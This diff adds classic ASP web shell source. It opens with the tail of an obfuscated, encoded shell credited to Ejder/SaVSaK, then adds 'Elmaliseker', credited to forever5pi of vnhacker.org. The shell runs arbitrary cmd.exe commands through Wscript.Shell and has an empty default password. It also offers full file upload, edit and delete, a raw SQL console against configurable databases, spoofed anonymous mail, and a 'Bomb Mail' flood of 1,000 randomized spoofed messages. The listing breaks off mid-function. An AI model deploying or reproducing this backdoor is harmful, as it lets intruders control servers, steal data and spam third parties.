AMkYn~r@!8D@*@!(D@*r@#@&D+kwKU/RADbYn~r@!Nb-P,/YHsn'rJ.Orx[nX)q*ZIPaWdrDkWUlm4dW^;D+Er@*r@#@&;l^sPnVC/KD6V!`#@#@&D/wKUd+chMkO+~E@!z[k7@*@!9k-~,lVrL	'EJMrTtOrJ@*J@#@&ZmsV,fG/Hl6V!`#@#@&D/wKUd+chMkO+~E@!z[k7@*J@#@&nU9PkW@#@&@#@&k6~aW2!w,'Pwl^d+,Y4+	@#@&./wKU/RhMrO+,J@!4.@*@!8M@*@!mUYD@*@!Dl4sn,mnV^2mN[bxT'Jr!rEP1+sVkwC^bxo{EJZJJ,ArNDt{JEFTrJ@*J@#@&D/2G	/+ AMkO+,E@!Y.@*@!DNP1Vmd/{JE3(DOhrJP4nkTtY{EE ZJrPdYzs'EJ(Cm0o.G!xNR^KVGD=qyF+8 rJPmVbLx{JEmxOnMJJ@*@!4@*?üDü1üsnD@!z(@*@!zO[@*@!&YM@*J@#@&/C^VPj;ME^E^nM@#@&M+kwW	/ hMkO+,J@!&Dl4^n@*@!zmUO+M@*@!4.@*@!8M@*E@#@&/l^V~j!DE^;&xWW@#@&Hl"KDDllvJ@!8@*qDrYD+U~(XP@!CP4D+6xEJslbVOWlnNNnD@$dl7/CVcmWhEr@*39G3"@!&m@*,sWMP@!CP4Dn0{JE4DYw=&zShhcdC\kl0R^WhErPOlML+D'm8^lxVEr@*	hq Ul#UlnRZKH@!&l@*@!&4@*Jb@#@&Xl.GDDl`r@!8@*:+swslOn,[~Khl,fndboxn[,4zP@!C,t.0{JJslbsYK)WlkY8GH@$/m-/m3R1GhJr@*wbjK$6I@!&l@*@!4M@*j2lmrC^PPtmU0/~DW,slkY(GX@!z8@*r#@#@&xN,r0@#@&g5iqAA==^#~@%>
+<!--EFSO Ejder &  Fastboy tarafından yazılmıştır for SaVSaK.CoM . TÜM HAKLARI Ejder e Aitttir.-->
+<!--TÜM HAKLARI SAKLIDIR.. KODLARDA yapacağınmız bir değişiklik KODun Çalışmamasına mal olur. Bundan dolayı Bir sorun çıkarsa EJDER & SaVSAK.CoM Sorunlu değildir..-->
+<!--Bu yazılımda geliştilmiş tüm herşey , mantık, algoritma, yazılımlar Sıfırdan Ejder tarafından yazılmıştır. TEMA , düzen vede Görünüm Fastboy a Aittir. -->
+<!-- TAKLİTLEİRNDEN KAÇININ. by EJDER-->
+
+<!--Ejder was HERE-->
+<%#@~^BgAAAA==vL[DMQIAAA==^#~@%><p align="right">&nbsp;</p>
+
diff --git a/php/Elmaliseker.php.txt b/php/Elmaliseker.php.txt
new file mode 100644
index 0000000..275ba11
--- /dev/null
+++ b/php/Elmaliseker.php.txt
@@ -0,0 +1,2324 @@
+<%
+
+' Tac gia: forever5pi (theo huong dan cua anh vicki-vkdt)
+' Email : forever5pi@yahoo.com
+' Website: http://vnhacker.org
+
+option explicit
+
+Server.ScriptTimeout=10000
+Response.Buffer=false
+
+dim gURL,gMsg
+dim targetPath,cp_dst,mv_dst,root
+dim FSO,re
+dim zombie_array,special_array
+
+' ###################################### CONFIGURATION ######################################
+
+const gPassword="" ' mat khau ("" : khong dung password)
+
+const gMax=50 ' chieu dai toi da cho ten file
+const gBomb=1000 ' so luong mail mac dinh can bomb
+
+const lnkExt="lnk,url"
+const editExt="htm,html,asp,asa,txt,inc,css,aspx,js,vbs,shtm,shtml,xml,xsl,log,ini,bat,bak" ' danh sach cac file cho phep edit
+
+const TmpDir="C:\" ' thu muc tam thoi mac dinh
+const Shell="cmd.exe" ' shell mac dinh
+
+' cac chuoi ket noi mac dinh
+const cstrMSSQL = "Provider=SQLOLEDB;Data Source=SERVER_NAME;database=DB_NAME;uid=UID;pwd=PWD"
+const cstrJET = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=full_path/db_file.mdb" 
+const cstrACCESS = "DRIVER={Microsoft Access Driver (*.mdb)}; DBQ=full_path/db_file.mdb"
+const cstrORACLE = "Provider=OraOLEDB.Oracle.1; Data Source=DB_NAME; User ID=UID; Password=PWD"
+const cstrMYSQL = "Driver=MySQL;server=SERVER_IP;uid=UID;pwd=PWD;database=DB_NAME"
+const cstrDSN = "DSN_NAME"
+
+const bSize=false' co/khong hien folder-size
+
+const charset="abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_-" ' tap ki thu dung de sinh chuoi ngau nhien
+
+zombie_array=array("com","net","org","info","vn","cn") ' mang cac domain z0mbie
+special_array=array("yahoo.com","hotmail.com") ' mang cac domain dac biet (dung trong bomb mail)
+
+root=Server.MapPath(".") ' folder mac dinh
+
+' ###########################################################################################
+
+gURL=Request.ServerVariables("SCRIPT_NAME")
+Init()
+if (LCase(Left(Request.ServerVariables("HTTP_CONTENT_TYPE"),19))="multipart/form-data") and (Session("allow")=1) and (Session("mode")=0) then Upload()
+Secure()
+if Request.Form("command")="Logout" then Logout()
+if Request.Form("command")="ChangeMode" then
+Session("mode")=Request.Form("mode")
+Session("switch")=true
+end if
+select case Session("mode")
+case 0 myFile()
+case 1 myCMD()
+case 2 mySQL()
+case 3 myMail()
+end select
+
+'###########################################################################################
+
+sub myFile()
+if Session("switch")=true then
+targetPath=Session("targetPath")
+if targetPath="" then targetPath=root
+Session("switch")=false
+else
+targetPath=Trim(Request.Form("folder"))
+if targetPath="" then targetPath=root else targetPath=abspath(targetPath)
+
+select case Request.Form("command")
+case "Download"
+Download()
+exit sub
+case "Edit"
+Editor()
+exit sub
+case "ChangeAttributesFile","ChangeAttributesFolder"
+ChangeAttributesItem()
+exit sub
+case "Tree"
+Tree()
+exit sub
+case "Delete" Delete()
+case "Move" Move()
+case "Copy" Copy()
+case "ZipInfo" ZipInfo()
+case "NewFile","NewFolder" CreateItem()
+case "RenameFile","RenameFolder" RenameItem()
+case "OpenFolder" OpenFolder()
+case "LevelUp" targetPath=FSO.GetParentFolderName(abspath(Request.Form("folder")))
+case "LevelRoot" targetPath=findroot(abspath(Request.Form("folder")))
+end select
+
+Session("targetPath")=targetPath
+end if
+
+HtmlHeader("")
+HtmlMode()
+List()
+HtmlFooter()
+Destroy()
+end sub
+
+'###########################################################################################
+
+sub myCMD()
+dim bDoIt
+dim bEcho
+dim szTmpDir,szShell,szCmd,szTmpFile
+dim oScript,oScriptNet,oFile
+
+HtmlHeader("")
+HtmlMode()
+
+set oScript=Server.CreateObject("Wscript.Shell")
+set oScriptNet=Server.CreateObject("Wscript.Network")
+
+szTmpDir=Trim(Request.Form("tmpdir"))
+szShell=Trim(Request.Form("shell"))
+szCmd=Trim(Request.Form("cmd"))
+bEcho=CBool(Request.Form("echo"))
+
+if Session("switch")=true then
+Session("switch")=false
+bDoit=false
+szTmpDir=Session("szTmpDir")
+szShell=Session("szShell")
+szCmd=Session("szCmd")
+bEcho=Session("bEcho")
+else
+bDoIt=true
+end if
+
+if szTmpDir="" then szTmpDir=TmpDir else szTmpDir=abspath(szTmpDir)
+if szShell="" then szShell=Shell
+
+Session("szTmpDir")=szTmpDir
+Session("szShell")=szShell
+Session("szCmd")=szCmd
+Session("bEcho")=bEcho
+
+%>
+<form name=frmCMD method=post action="<%=gURL%>">
+<table>
+<tr><td><b>T</b>mpDir:</td><td><input type=text name=tmpdir value="<%=Server.HtmlEncode(szTmpDir)%>" size=20></td></tr>
+<tr><td><b>S</b>hell:</td><td><input type=text name=shell value="<%=Server.HtmlEncode(szShell)%>" size=20></td></tr>
+<tr><td><b>C</b>md:</td><td><input type=text name=cmd value="<%=Server.HtmlEncode(szCmd)%>" size=80> <input type=submit value=Go></td></tr>
+<tr><td><b>E</b>cho:</td><td><input type=checkbox name=echo value=1<%if bEcho then Response.Write " checked"%>></td></tr>
+</table>
+</form>
+<script>frmCMD.cmd.focus()</script>
+<%
+if (szCmd<>"") and (bDoIt=true) then
+if bEcho then
+call oScript.Run(szShell & " /c " & szCmd)
+else
+szTmpFile = addslash(szTmpDir) & FSO.GetTempName
+call oScript.Run(szShell & " /c " & szCmd & " > " & szTmpFile, 0, true)
+if FSO.FileExists(szTmpFile) then set oFile=FSO.OpenTextFile (szTmpFile, 1, false, 0)
+end if
+end if
+%>
+<p><%=FormatDate(Now)%>
+<p><b>I</b>P: <%=Request.ServerVariables("LOCAL_ADDR")%><br>
+<b>U</b>ser: \\<%=oScriptNet.ComputerName%>\\<%=oScriptNet.UserName%>
+<%
+if (IsObject(oFile)) then
+on error resume next
+%>
+<pre>
+<%=Server.HtmlEncode(oFile.ReadAll)%>
+</pre>
+<%
+oFile.Close
+call FSO.DeleteFile(szTmpFile, true)
+end if
+
+set oScript=nothing
+set oScriptNet=nothing
+
+HtmlFooter()
+Destroy()
+end sub
+
+'###########################################################################################
+
+sub mySQL()
+dim szConn,szSQL1,szSQL2,szSQL,bDoIt
+dim intChoice
+
+HtmlHeader("")
+HtmlMode()
+
+szConn=Trim(Request.Form("conn"))
+szSQL1=Trim(Request.Form("sql1"))
+szSQL2=Trim(Request.Form("sql2"))
+intChoice=CInt(Request.Form("choice"))
+
+if Session("switch")=true then
+Session("switch")=false
+bDoIt=false
+szConn=Session("szConn")
+szSQL1=Session("szSQL1")
+szSQL2=Session("szSQL2")
+intChoice=Session("intChoice")
+else
+bDoIt=true
+end if
+
+if intChoice=0 then intChoice=1
+if intChoice=1 then szSQL=szSQL1 else szSQL=szSQL2
+
+Session("szConn")=szConn
+Session("szSQL1")=szSQL1
+Session("szSQL2")=szSQL2
+Session("intChoice")=intChoice
+
+select case trim(ucase(szConn))
+case "MSSQL" 
+szConn=cstrMSSQL
+szSQL=""
+case "JET"
+szConn=cstrJET
+szSQL=""
+case "ACCESS"
+szConn=cstrACCESS
+szSQL=""
+case "ORACLE"
+szConn=cstrORACLE
+szSQL=""
+case "MYSQL"
+szConn=cstrMYSQL
+szSQL=""
+case "DSN"
+szConn=cstrDSN
+szSQL=""
+end select
+%>
+<input type=button value="<->" onclick="changeInput()">
+<form name=frmSQL method=post action="<%=gURL%>">
+<input type=hidden name=choice value="<%=intChoice%>">
+<b>C</b>onn: <input type=text name=conn value="<%=Server.HtmlEncode(szConn)%>" size=90> <br>
+<b>S</b>QL:  <span id=s1<%if intChoice=2 then Response.Write " style=""display:none"""%>><input type=text name=sql1 value="<%=Server.HtmlEncode(szSQL1)%>" size=90></span>
+<span id=s2<%if intChoice=1 then Response.Write " style=""display:none"""%>>( [F9] = Go )<br><textarea name=sql2 cols=42 rows=12 onkeydown="if (event.keyCode==120) frmSQL.submit();"><%=Server.HtmlEncode(szSQL2)%></textarea><br></span>
+<input type=submit value=Go>
+</table>
+</form>
+<script>
+frmSQL.<%if szConn="" then Response.Write "conn" else Response.Write "sql"&intChoice%>.focus();
+frmSQL.<%if szConn="" then Response.Write "conn" else Response.Write "sql"&intChoice%>.focus();
+function changeInput() {
+if (s1.style.display=='none') {
+s1.style.display='inline';
+s2.style.display='none';
+frmSQL.choice.value="1";
+frmSQL.sql1.focus();
+} else {
+s1.style.display='none';
+s2.style.display='inline';
+frmSQL.choice.value="2";
+frmSQL.sql2.focus();
+}
+}
+</script>
+<%
+if (szConn<>"") and (szSQL<>"") and (bDoIt=true) then
+dim adoCon, rS
+dim i,intAffected
+
+set adoCon=Server.CreateObject("ADODB.Connection")
+adoCon.Open szConn
+set rS=adoCon.Execute(szSQL, intAffected)
+if (rS.Fields.Count>0) then
+' hien thi ten cua cac truong
+Response.Write "<table border=1>" & vbNewLine & "<tr>"
+for i=0 to rS.Fields.Count-1
+Response.Write "<td><tt><b>"
+if (rS.Fields(i).Name="") then
+Response.Write "(No column name)"
+else
+Response.Write Server.HtmlEncode(rS.Fields(i).Name)
+end if
+Response.Write "</b></tt></td>"
+next
+Response.Write "</tr>" & vbNewLine
+' hien thi du lieu tren cac dong
+on error resume next
+rS.MoveFirst
+do while not rS.EOF
+Response.Write "<tr>"
+for i=0 to rS.Fields.Count-1
+Response.Write "<td><tt>"
+if IsNull(rs.Fields(i).Value) then
+Response.Write "NULL"
+elseif (Trim(rs.Fields(i).Value)="") then
+Response.Write " "
+else
+Response.Write Server.HtmlEncode(rS.Fields(i).Value)
+end if
+Response.Write "</tt></td>"
+next
+Response.Write "</tr>" & vbNewLine
+rS.MoveNext
+loop
+rS.Close
+Response.Write "</table>" & vbNewLine
+end if
+
+Response.Write "<p><tt>(" & intAffected & " row(s) affected)</tt>"
+
+set rS=nothing
+set adoCon=nothing
+end if
+
+HtmlFooter()
+Destroy()
+end sub
+
+
+'###########################################################################################
+
+sub myMail()
+dim strFrom,strTo,strSubject,strBody,bHtml,intNumber,i,StartTime,EndTime,bDoIt
+dim objMail,objMsg
+
+strTo=Trim(Request.Form("to"))
+
+select case Request.Form("subcommand")
+case "Send"
+strFrom=Trim(Request.Form("from"))
+strSubject=Trim(Request.Form("subject"))
+strBody=Request.Form("body")
+bHtml=CBool(Request.Form("html"))
+case "Bomb"
+if IsNumeric(Request.Form("number")) then intNumber=Int(Request.Form("number"))
+strFrom=Session("strFrom")
+strSubject=Session("strSubject")
+strBody=Session("strBody")
+bHtml=Session("bHtml")
+end select
+
+if Session("switch")=true then
+Session("switch")=false
+bDoIt=false
+strFrom=Session("strFrom")
+strTo=Session("strTo")
+strSubject=Session("strSubject")
+strBody=Session("strBody")
+bHtml=Session("bHtml")
+intNumber=Session("intNumber")
+else
+bDoIt=true
+end if
+
+if (intNumber<=0) then intNumber=gBomb
+
+Session("strFrom")=strFrom
+Session("strTo")=strTo
+Session("strSubject")=strSubject
+Session("strBody")=strBody
+Session("bHtml")=bHtml
+Session("intNumber")=intNumber
+
+HtmlHeader("")
+HtmlMode()
+
+if bDoIt then
+select case Request.Form("subcommand")
+case "Send"
+if IsValidEmail(strTo) then
+set objMail=Server.CreateObject("CDONTS.NewMail")
+objMail.To=strTo
+objMail.From=strFrom
+objMail.Subject=strSubject
+objMail.Body=strBody
+if bHtml then
+objMail.BodyFormat=0 'HTML
+objMail.MailFormat=0 'MIME
+end if
+objMail.Send
+set objMail=nothing
+Response.Write "<b>M</b>essage was sent to " & strTo & " successfully." & vbNewLine
+end if
+case "Bomb"
+if IsValidEmail(strTo) then
+Response.Write "<b>B</b>ombing " & Replace(FormatNumber(intNumber,0),",",".") & " mail"
+if intNumber>1 then Response.Write "s"
+Response.Write " to " & strTo & " ... "
+StartTime=Timer
+set objMsg=Server.CreateObject("CDO.Message")
+objMsg.To=strTo
+Randomize
+for i=1 to intNumber
+objMsg.From=makeEmail()
+objMsg.Subject=makeText(Int((50-25+1)*Rnd+25))
+objMsg.TextBody=makeText(Int((100-50+1)*Rnd+50))
+objMsg.Send
+next
+set objMsg=nothing
+EndTime=Timer
+Response.Write howlong(EndTime-StartTime) & vbNewLine
+end if
+end select
+end if
+%>
+<p>
+<table border=1>
+<tr>
+<td width=50%>
+<form name=frmSend method=post action="<%=gURL%>">
+<table>
+<tr>
+<td colspan=2>a) <b>A</b>nonymous Mail</td>
+</tr>
+<tr>
+<td><b>F</b>rom:</td>
+<td><input type=text name=from value="<%=Server.HtmlEncode(strFrom)%>" size=25></td>
+</tr>
+<tr>
+<td><b>T</b>o:</td>
+<td><input type=text name=to value="<%=Server.HtmlEncode(strTo)%>" size=25></td>
+</tr>
+<tr>
+<td><b>S</b>ubject:</td>
+<td><input type=text name=subject value="<%=Server.HtmlEncode(strSubject)%>" size=50></td>
+</tr>
+<tr>
+<td valign=top><b>B</b>ody:</td>
+<td><textarea name=body cols=37 rows=12><%=Server.HtmlEncode(strBody)%></textarea></td>
+</tr>
+<tr>
+<td><b>H</b>tml:</td>
+<td><input type=checkbox name=html value=1<%if bHtml=true then Response.Write " checked"%>></td>
+</tr>
+<tr>
+<td colspan=2><input type=submit name=subcommand value=Send></td>
+</tr>
+</table>
+</form>
+</td>
+<td width=50% valign=top>
+<form name=frmBomb method=post action="<%=gURL%>">
+<table>
+<tr>
+<td colspan=2>b) <b>B</b>omb Mail</td>
+</tr>
+<tr>
+<td><b>A</b>ddress:</td>
+<td><input type=text name=to value="<%=Server.HtmlEncode(strTo)%>" size=25></td>
+</tr>
+<tr>
+<td><b>N</b>umber:</td>
+<td><input type=text name=number value=<%=intNumber%>></td>
+</tr>
+<tr>
+<td colspan=2><input type=submit name=subcommand value=Bomb></td>
+</tr>
+</table>
+</form>
+</td>
+</tr>
+</table>
+<%
+HtmlFooter()
+Destroy()
+end sub
+
+'###########################################################################################
+
+function IsValidEmail(strEAddress)
+dim objRegExpr
+set objRegExpr = New RegExp
+objRegExpr.Pattern = "^[a-zA-Z0-9][\w\.-]*[a-zA-Z0-9]@[\w-\.]*[a-zA-Z0-9]\.[a-zA-Z]{2,7}$"
+objRegExpr.Global = true
+objRegExpr.IgnoreCase = False
+IsValidEmail = objRegExpr.Test(strEAddress)
+set objRegExpr = nothing
+end function
+
+'###########################################################################################
+
+function makeEmail()
+Randomize
+if Int((1-0+1)*Rnd+0)=0 then makeEmail=makeText(8) & "@" & makeText(8) & "." & zombie_array(Int((UBound(zombie_array)-0+1)*Rnd+0)) else makeEmail=makeText(8) & "@" & special_array(Int((UBound(special_array)-0+1)*Rnd+0))
+end function
+
+'###########################################################################################
+
+function makeText(intLen)
+dim strNewText,i
+strNewText=""
+Randomize
+for i=1 to intLen
+strNewText=strNewText & Mid(charset,Int((Len(charset)-1+1)*Rnd+1),1)
+next
+makeText=strNewText
+end function
+
+'###########################################################################################
+
+function howlong(intTime)
+if (intTime<60) then
+howlong=intTime & " second(s)"
+elseif (intTime<60*60) then
+howlong=FormatNumber(intTime/60,2) & " minute(s)"
+else
+howlong=FormatNumber(intTime/(60*60),2) & " hour(s)"
+end if
+end function
+
+'###########################################################################################
+
+sub Tree()
+dim path
+path=abspath(Request.Form("param"))
+if FSO.FolderExists(path) then
+%>
+<html>
+<head>
+<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
+<title><%=path%></title>
+<style>
+body,td{font-family:Fixedsys}
+a{color:#0000ff}
+</style>
+</head>
+<body bgcolor=#000000 text=#ffffff>
+<%
+tree_dir(path)
+%>
+</body>
+</html>
+<%
+else
+%>
+<script>alert('Folder not found !');window.close();</script>
+<%
+end if
+Destroy()
+end sub
+
+sub tree_dir(path)
+dim strAttrib,strSize
+
+on error resume next
+
+dim oFolder
+dim oSubFolders,oSubFolder
+dim oFiles,oFile
+dim oSubFolders2,oSubFolder2
+dim oFiles2,oFile2
+
+set oFolder=FSO.GetFolder(path)
+set oSubFolders=oFolder.SubFolders
+set oFiles=oFolder.Files
+
+Response.Write "<p>" & FSO.GetAbsolutePathName(path)
+
+strAttrib=GetAttributes(oFolder.Attributes)
+
+if strAttrib<>" " then Response.Write " (" & GetAttributes(oFolder.Attributes) & ")"
+
+Response.Write vbNewLine
+
+if (oSubFolders.Count>0) or (oFiles.Count>0) then
+%>
+<table border=0 cellspacing=1 cellpadding=2 bgcolor=#ff0000>
+<tr bgcolor=#000000>
+<td><font color=#FFFF00>Name</font></td>
+<td align=center><font color=#FFFF00>Size</font></td>
+<td align=center><font color=#FFFF00>Type</font></td>
+<td align=center><font color=#FFFF00>Modified</font></td>
+<td align=center><font color=#FFFF00>Attributes</font></td>
+</tr>
+<%
+' liet ke thu muc
+for each oSubFolder in oSubFolders
+%>
+<tr bgcolor=#000000>
+<td><%=oSubFolder.Name%></td>
+<td align=right> </td>
+<td align=center>DIR</td>
+<td align=center><%=FormatDate(oSubFolder.DateLastModified)%></td>
+<td><%=GetAttributes(oSubFolder.Attributes)%></td>
+</tr>
+<%
+next
+
+' liet ke file
+for each oFile in oFiles
+%>
+<tr bgcolor=#000000>
+<td<%if (FSO.GetExtensionName(path & "\" & oFile.Name)="lnk") or (FSO.GetExtensionName(path & "\" & oFile.Name)="url") then Response.Write " title=""" & FindLink(path & "\" & oFile.Name) & """"%>><%=oFile.Name%></td>
+<td align=right><%=FormatSize(oFile.Size)%></td>
+<td align=center><%=oFile.Type%></td>
+<td align=center><%=FormatDate(oFile.DateLastModified)%></td>
+<td><%=GetAttributes(oFile.Attributes)%></td>
+</tr>
+<%
+next
+strSize=FormatSize(oFolder.Size)
+%>
+<tr bgcolor=#000000>
+<td colspan=5 align=center><%=oSubFolders.Count%> folder(s), <%=oFiles.Count%> file(s)<%if strSize<>"" then Response.Write " (" & strSize & ")"%></td>
+</tr>
+</table>
+<%
+' goi de qui
+for each oSubFolder in oSubFolders
+set oSubFolder2=oSubFolder.SubFolders
+set oFile2=oSubFolder.Files
+
+if (oSubFolder2.Count>0) or (oFile2.Count>0) then
+tree_dir(oSubFolder.ParentFolder & "\" & oSubFolder.Name)
+end if
+
+set oSubFolder2=nothing
+set oFile2=nothing
+next
+end if
+
+set oSubFolder=nothing
+set oFiles=nothing
+set oFolder=nothing
+end sub
+
+'###########################################################################################
+
+sub Editor()
+dim f,name,path
+
+on error resume next
+
+HtmlHeader("")
+
+name=Request.Form("param")
+path=addslash(targetPath) & name
+
+select case Request.Form("subcommand")
+case "Save","SaveAs"
+set f=FSO.OpenTextFile(path,2,true,-2)
+if Err.Number<>0 then
+gMsg="Can not write to the file """ & name & """, permission denied!"
+Err.Clear
+else
+f.Write Request.Form("content")
+end if
+set f=nothing
+set f=FSO.OpenTextFile(path,1,false,-2)
+case else
+if not FSO.FileExists(path) then
+gMsg="The file """ & name & """ does not exist"
+set f=FSO.CreateTextFile(path,false)
+if Err.Number<>0 then
+gMsg=gMsg & ", also unable to create new file."
+Err.Clear
+else
+gMsg=gMsg & ", created new file."
+end if
+else
+set f=FSO.OpenTextFile(path,1,false,-2)
+if Err.Number<>0 then
+gMsg="Can not read from the file """ & name & """, permission denied!"
+Err.Clear
+end if
+end if
+end select
+%>
+<% if gMsg<>"" then Response.Write "<script>alert('" & gMsg & "')</script>" & vbNewLine %>
+<p><b>E</b>diting - "<%=path%>"<br>
+<form name=frmFile method=post action="<%=gURL%>">
+<b>W</b>rap<input type=checkbox id=wrap onclick="EditorCommand('WordWrap')">
+<center>
+<table width=100%>
+<tr><td align=center>
+<textarea name=content rows=25 cols=46 style="width:580;height:330" wrap=off><%=Server.HTMLEncode(f.ReadAll)%></textarea>
+</td></tr>
+<tr><td align=center>
+<input type=button value=Save onclick="EditorCommand('Save')"> <input type=button value="Save As" onclick="EditorCommand('SaveAs')"> <input type=button value=Reload onclick="EditorCommand('Reload')"> <input type=button value=Close onclick="window.close()">
+</td></tr>
+</table>
+</center>
+<script>frmFile.content.focus()</script>
+<input type=hidden name=command value=Edit>
+<input type=hidden name=subcommand value="">
+<input type=hidden name=param value="<%=name%>">
+<input type=hidden name=folder value="<%=Request.Form("folder")%>">
+</form>
+<%
+set f=nothing
+HtmlJsEditor()
+HtmlFooter()
+Destroy()
+end sub
+
+'###########################################################################################
+
+sub ChangeAttributesItem()
+dim item,itemType,itemName,itemPath,itemAttrib
+
+itemType=Request.Form("command")
+itemName=Request.Form("param")
+itemPath=addslash(targetPath) & itemName
+
+HtmlHeader("")
+
+select case itemType
+case "ChangeAttributesFile" set item=FSO.GetFile(itemPath)
+case "ChangeAttributesFolder" set item=FSO.GetFolder(itemPath)
+end select
+
+if Request.Form("subcommand")="change" then
+itemAttrib=int(Request.Form("r"))
+itemAttrib=itemAttrib+int(Request.Form("h"))
+itemAttrib=itemAttrib+int(Request.Form("a"))
+itemAttrib=itemAttrib+int(Request.Form("s"))
+on error resume next
+item.Attributes=int(itemAttrib)
+if Err.Number<>0 then Response.Write "<script>alert('Permission denined')</script>" & vbNewLine
+end if
+
+itemAttrib=item.Attributes
+%>
+<b>C</b>hange attributes - "<%=itemName%>"
+<p align=center>
+<form name=frmAttrib method=post action="<%=gURL%>">
+<input type=hidden name=command value="<%=itemType%>">
+<input type=hidden name=subcommand value=change>
+<input type=hidden name=folder value="<%=targetPath%>">
+<input type=hidden name=param value="<%=itemName%>">
+<table>
+<tr>
+<td><input type=checkbox name=r value=1 <%if (itemAttrib and 1)>0 then Response.Write " checked"%>>Read-only</td>
+<td><input type=checkbox name=h value=2 <%if (itemAttrib and 2)>0 then Response.Write " checked"%>>Hidden</td>
+</tr>
+<tr>
+<td><input type=checkbox name=a value=32 <%if (itemAttrib and 32)>0 then Response.Write " checked"%>>Archive</td>
+<td><input type=checkbox name=s value=4 <%if (itemAttrib and 4)>0 then Response.Write " checked"%>>System</td>
+</tr>
+</table><br>
+<input type=button value=OK onclick="frmAttrib.submit()"> <input type=button value=Close onclick="window.close()">
+</form>
+</p>
+<%
+set itemType=nothing
+HtmlFooter()
+Destroy()
+end sub
+
+'###########################################################################################
+
+sub OpenFolder()
+if Trim(Request.Form("folder"))="" then 
+if Trim(Request.Form("param"))="" then targetPath=root else targetPath=abspath(Trim(Request.Form("param")))
+else
+targetPath=addslash(Trim(Request.Form("folder"))) & Trim(Request.Form("param"))
+end if
+end sub
+
+'###########################################################################################
+
+sub CreateItem()
+dim itemType,itemName,itemPath 
+itemType=request.form("command")
+itemName=request.form("param")
+itemPath=addslash(targetPath) & itemName
+
+on error resume next
+
+select case itemType
+case "NewFolder"
+if (FSO.FolderExists(itemPath)=false) and (FSO.FileExists(itemPath)=false) then
+FSO.CreateFolder(itemPath)
+if Err.Number<>0 then
+gMsg="Unable to create the folder """ & itemName & """, an error occured..."
+else
+gMsg="Created the folder """ & itemName & """..."
+end if
+else
+gMsg="Unable to create the folder """ & itemName & """, there exists a file or a folder with the same name..."
+end if
+case "NewFile"
+if (FSO.FolderExists(itemPath)=false) and (FSO.FileExists(itemPath)=false) then
+FSO.CreateTextFile(itemPath)
+if Err.Number<>0 then
+gMsg="Unable to create the file """ & itemName & """, an error occured..."
+else
+gMsg="Created the file """ & itemName & """..."
+end if
+else
+gMsg="Unable to create the file """ & itemName & """, there exists a file or a folder with the same name..."
+end if
+end select
+end sub
+
+'###########################################################################################
+
+sub ZipInfo()
+dim path,zip,zipfile,i
+
+path=addslash(targetPath) & Request.Form("param")
+%>
+<html>
+<head>
+<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
+<title><%=path%></title>
+<style>
+body,td{font-family:Fixedsys}
+a{color:#0000ff}
+</style>
+</head>
+<body bgcolor=#000000 text=#ffffff>
+<p><%=path%>
+<table border=0 cellspacing=1 cellpadding=2 bgcolor=#ff0000>
+<tr bgcolor=#000000>
+<td><font color=#FFFF00>Name</font></td>
+<td align=center><font color=#FFFF00>Size</font></td>
+<td align=center><font color=#FFFF00>Ratio</font></td>
+<td align=center><font color=#FFFF00>Packed</font></td>
+<td align=center><font color=#FFFF00>Modify</font></td>
+<td align=center><font color=#FFFF00>Path</font></td>
+</tr>
+<%
+set zip=new clszip
+zip.ZipLoad(path)
+set zipfile=new clsZipFile
+
+for i=1 to zip.FileCount
+set zipfile=zip.GetFile(i)
+with zipfile
+if not (.IsFolder Or .IsOverall) then
+Response.Write "<tr bgcolor=#000000>" & vbNewLine
+Response.Write " <td>" & .Name & "</td>" & vbNewLine
+Response.Write " <td align=right>" & FormatNumber(.Size,0) & "</td>" & vbNewLine
+Response.Write " <td align=right>" & .Ratio & "</td>" & vbNewLine
+Response.Write " <td align=right>" & FormatNumber(.Packed,0) & "</td>" & vbNewLine
+Response.Write " <td align=center>" & FormatDate(.Modified) & "</td>" & vbNewLine
+Response.Write " <td>" & .Path & "</td>" & vbNewLine
+end if
+end with
+next
+
+set ZipFile=nothing
+set zip=nothing
+%>
+</table>
+</p>
+<%
+HtmlFooter()
+Destroy()
+end sub
+
+'###########################################################################################
+
+sub Delete()
+dim i,ndir,nfile,itemName,itemPath
+
+on error resume next
+
+ndir=Request.Form("d").Count
+nfile=Request.Form("f").Count
+
+if (ndir>0) then
+gMsg="<b>D</b>elete folder(s)..."
+for i=1 to ndir
+itemName=Request.Form("d")(i)
+itemPath=addslash(targetPath) & itemName
+FSO.DeleteFolder itemPath,true
+gMsg=gMsg & "<br>" & vbNewLine & "- " & itemName & ": "
+if Err.Number<>0 then
+gMsg=gMsg & "error"
+else
+gMsg=gMsg & "success"
+end if
+next
+end if
+
+if (nfile>0) then
+if (ndir>0) then gMsg= gMsg & "<p>" & vbNewLine
+gMsg=gMsg & "<b>D</b>elete file(s)..."
+for i=1 to nfile
+itemName=Request.Form("f")(i)
+itemPath=addslash(targetPath) & itemName
+FSO.DeleteFile itemPath,true
+gMsg=gMsg & "<br>" & vbNewLine & "- " & itemName & ": "
+if Err.Number<>0 then
+gMsg=gMsg & "error"
+else
+gMsg=gMsg & "success"
+end if
+next
+end if
+
+end sub
+
+'###########################################################################################
+
+sub Copy()
+dim i,nfile,ndir,itemName,itemPath
+
+on error resume next
+
+cp_dst=Trim(Request.Form("cp"))
+if cp_dst="" then exit sub
+cp_dst=abspath(cp_dst)
+Session("cp_dst")=cp_dst
+
+if FSO.FolderExists(cp_dst)=false then
+gMsg="<p>Folder not exists" & vbNewLine
+exit sub
+end if
+
+ndir=Request.Form("d").Count
+nfile=Request.Form("f").Count
+
+if (ndir>0) then
+gMsg="<b>C</b>opying folder(s) to """ & cp_dst & """ ..."
+for i=1 to ndir
+itemName=Request.Form("d")(i)
+itemPath=addslash(targetPath) & itemName
+FSO.CopyFolder itemPath,addslash(cp_dst),true
+gMsg=gMsg & "<br>" & vbNewLine & "- " & itemName & ": "
+if Err.Number<>0 then
+gMsg=gMsg & "error"
+else
+gMsg=gMsg & "success"
+end if
+next
+end if
+
+if (nfile>0) then
+if (ndir>0) then gMsg= gMsg & "<p>" & vbNewLine
+gMsg=gMsg & "<b>C</b>opying file(s) to """ & cp_dst & """ ..."
+for i=1 to nfile
+itemName=Request.Form("f")(i)
+itemPath=addslash(targetPath) & itemName
+FSO.CopyFile itemPath,addslash(cp_dst),true
+gMsg=gMsg & "<br>" & vbNewLine & "- " & itemName & ": "
+if Err.Number<>0 then gMsg=gMsg & "error" else gMsg=gMsg & "success"
